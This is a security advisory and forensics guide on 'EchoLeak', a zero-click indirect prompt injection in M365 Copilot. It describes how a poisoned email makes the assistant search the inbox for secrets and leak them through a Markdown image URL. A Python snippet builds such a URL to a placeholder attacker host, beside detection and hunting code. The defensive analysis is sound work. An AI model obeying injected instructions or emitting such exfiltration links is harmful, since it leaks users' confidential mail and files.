
CVE-2025-32711: M365 Copilot 'EchoLeak' Zero-Click IPI

As detailed by the Aim Labs researchers at Aim Security, who discovered and disclosed the flaw, CVE-2025-32711 exposes the severe consequences of granting Large Language Models (LLMs) broad data access (Microsoft Graph) without strict isolation between trusted instructions and untrusted content.

EchoLeak leverages a flaw in how M365 Copilot sanitizes external inputs before processing them through its internal orchestration layer. By embedding malicious instructions in a benign-looking document, an attacker forces Copilot to become a “Confused Deputy.” Once triggered, the AI agent abuses its authorized access to read the user’s emails, Teams chats, and SharePoint files, and silently exfiltrates them to an external server.

The vulnerability is rooted in the convergence of two concepts we have extensively documented in the Codex: Indirect Prompt Injection (IPI) and the lack of strict Output Sanitization.

In a standard Copilot workflow, the AI uses Microsoft Graph to retrieve context (RAG) to assist the user. EchoLeak weaponizes this retrieval phase. The attacker crafts a payload that combines instruction-level manipulation of the LLM (e.g., telling it to act as a diagnostic tool) with a technical exfiltration vector.

Since Copilot supports Markdown rendering in its chat interface to display rich text and images, attackers abused this feature. The poisoned prompt forces the LLM to generate a Markdown image tag (![alt](https://attacker.com/log?data=[EXFILTRATED_DATA])). When the Copilot web or desktop client renders this hidden image, the HTTP GET request is fired, effectively leaking the appended sensitive data to the attacker’s server.
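The mechanics of this vector can be sketched in a few lines of Python. The domain, path, and parameter names below are illustrative placeholders, not the actual EchoLeak payload:

```python
from urllib.parse import quote, urlparse, parse_qs

def build_exfil_image_tag(stolen_text: str) -> str:
    """Illustrative only: shows how stolen data rides in the query string
    of a Markdown image URL. 'attacker.example' is a placeholder domain."""
    return f"![loading](https://attacker.example/log?data={quote(stolen_text)})"

tag = build_exfil_image_tag("Q3 forecast: confidential")

# When a Markdown renderer displays this tag, it issues an HTTP GET for the
# image URL, delivering the encoded data to the attacker-controlled server.
url = tag[tag.index("(") + 1 : -1]
leaked = parse_qs(urlparse(url).query)["data"][0]
print(leaked)
```

The key property being abused is that image rendering is an *implicit* network request: the victim's client, not the attacker, makes the connection, so it originates from a trusted host inside the tenant.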

The most alarming aspect of EchoLeak is the “Zero-Click” vector. The victim does not need to explicitly ask Copilot about the malicious document.

  1. Delivery: The attacker sends a seemingly harmless email (or shares a SharePoint document) containing the hidden EchoLeak payload.
  2. Autonomous Indexing: The victim opens their M365 dashboard. Copilot autonomously scans recent emails to generate the “Catch up on your day” summary or meeting prep notes.
  3. Payload Execution: Copilot ingests the malicious email. The embedded prompt injection overrides the summary instruction.
  4. Data Harvesting: The payload instructs Copilot to use its Graph API access to search for “Password”, “Confidential”, or “Financial” in the victim’s inbox.
  5. Silent Exfiltration: Copilot formats the stolen data into a Markdown image URL and outputs it. The client renders the invisible image, firing an HTTP GET (preceded by a DNS lookup of the attacker's domain) that carries the data out.
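The final step in the chain above is precisely what output sanitization should catch before rendering. A minimal detection sketch, assuming a simple domain allowlist (the allowlist and matching logic are illustrative, not Microsoft's actual filter):

```python
import re

# Markdown image syntax: ![alt](url)
IMG_RE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")
TRUSTED = ("microsoft.com", "office.com")  # illustrative allowlist

def flag_untrusted_images(llm_output: str) -> list[str]:
    """Return image URLs in model output that point outside the allowlist.
    Note: naive substring matching is bypassable (e.g. a path containing
    'microsoft.com'); real filters should compare parsed hostnames."""
    urls = IMG_RE.findall(llm_output)
    return [u for u in urls if not any(t in u for t in TRUSTED)]

benign = "Here is your chart: ![chart](https://res.microsoft.com/c.png)"
poisoned = "Summary done. ![x](https://attacker.example/log?data=secret)"
print(flag_untrusted_images(benign))
print(flag_untrusted_images(poisoned))
```

In production the check belongs between the LLM and the renderer, and should operate on the parsed hostname suffix rather than a substring, as the comment notes.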

Because this vulnerability executes entirely within Microsoft’s SaaS infrastructure, traditional host-based forensic artifacts (like memory dumps or local process trees) are unavailable. DFIR analysts must pivot entirely to Cloud Forensics, specifically targeting the Unified Audit Log (UAL) and Microsoft Purview.

  • Copilot Interaction Events: Analysts must query the CopilotInteraction events within the UAL. While Microsoft redacts the exact prompts for privacy reasons, metadata about the interaction time and the files accessed by the Copilot agent during that session are visible.
  • Anomalous Graph API Access: Look for spikes in Microsoft Graph API read events originating from the Copilot service account on behalf of a user, especially if those reads target highly sensitive SharePoint sites immediately after the user received an external email.
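For triage at scale, exported UAL records (e.g. from Search-UnifiedAuditLog, which returns each event's detail as an AuditData JSON blob) can be filtered offline. A sketch of that filtering; field names such as AccessedResources follow common UAL conventions but should be verified against your tenant's actual export schema:

```python
import json

def copilot_sessions(ual_records: list[dict]) -> list[dict]:
    """Pull CopilotInteraction events and the resources Copilot touched.
    'AccessedResources' is an assumed field name; confirm against your export."""
    hits = []
    for rec in ual_records:
        raw = rec.get("AuditData", {})
        audit = json.loads(raw) if isinstance(raw, str) else raw
        if audit.get("Operation") == "CopilotInteraction":
            hits.append({
                "time": audit.get("CreationTime"),
                "user": audit.get("UserId"),
                "resources": audit.get("AccessedResources", []),
            })
    return hits

# Toy record shaped like a UAL export row
sample = [{"AuditData": json.dumps({
    "Operation": "CopilotInteraction",
    "CreationTime": "2025-06-11T09:14:02",
    "UserId": "alice@contoso.com",
    "AccessedResources": ["https://contoso.sharepoint.com/finance/Q3.xlsx"],
})}]
print(copilot_sessions(sample))
```

Correlating the resulting session times against inbound external email timestamps gives the "interaction shortly after delivery" signal described above.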

While Microsoft patched the specific Markdown rendering flaw, the underlying threat of IPI remains. SOC teams must hunt for anomalous AI behavior.

hunt_echoleak_exfiltration.kql

```kql
// Hunts for Copilot interactions followed by suspicious network connections
// indicating potential Markdown-based data exfiltration.
let CopilotEvents = CloudAppEvents
| where Application == "Microsoft 365 Copilot"
| where ActionType == "CopilotInteraction"
| project TimeGenerated, AccountObjectId, IPAddress;
DeviceNetworkEvents
| where TimeGenerated > ago(7d)
| join kind=inner (CopilotEvents) on $left.InitiatingProcessAccountObjectId == $right.AccountObjectId
// Look for network connections occurring within 60 seconds of a Copilot interaction
| where datetime_diff('second', TimeGenerated, TimeGenerated1) between (0 .. 60)
// Filter out legitimate Microsoft domains
| where RemoteUrl !contains "microsoft.com" and RemoteUrl !contains "office.com"
| where RemoteUrl contains "=" // query strings (?data=...) are common in exfiltration URLs
| project TimeGenerated, AccountObjectId, RemoteUrl, RemoteIP
```
Key remediation and hardening takeaways:

  1. Vendor Remediation: Microsoft has implemented sanitization filters at the cloud edge to block Markdown-based exfiltration; because the fix is server-side, no endpoint patching is required.
  2. Zero Trust for AI: This incident proves that AI agents cannot implicitly trust internal data. Organizations must apply strict Data Loss Prevention (DLP) labels (Microsoft Purview Information Protection) to sensitive documents to prevent Copilot from accessing them, mitigating the impact of any future “Zero-Click” agent vulnerabilities.
  3. Phishing Defense: Treat IPI as a highly advanced phishing vector. Reinforce defenses detailed in the Business Email Compromise (BEC) Playbook.
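The Zero Trust point in item 2 amounts to a policy gate in front of retrieval. A hypothetical sketch of that gate (the label names and the gating function are illustrative; actual enforcement lives in Purview sensitivity label policies, not application code):

```python
# Sensitivity labels an AI agent should never pull into its context window.
BLOCKED_LABELS = {"Highly Confidential", "Restricted"}

def retrievable_by_copilot(doc: dict) -> bool:
    """Gate RAG retrieval on the document's sensitivity label.
    'sensitivity_label' is a hypothetical metadata field for illustration."""
    return doc.get("sensitivity_label") not in BLOCKED_LABELS

docs = [
    {"name": "lunch-menu.docx", "sensitivity_label": "General"},
    {"name": "merger-terms.docx", "sensitivity_label": "Highly Confidential"},
]
# Only documents passing the gate ever reach the model's context.
context = [d["name"] for d in docs if retrievable_by_copilot(d)]
print(context)
```

The design point is that labelling moves the trust decision out of the model: even a fully compromised prompt cannot exfiltrate a document the retrieval layer never handed over.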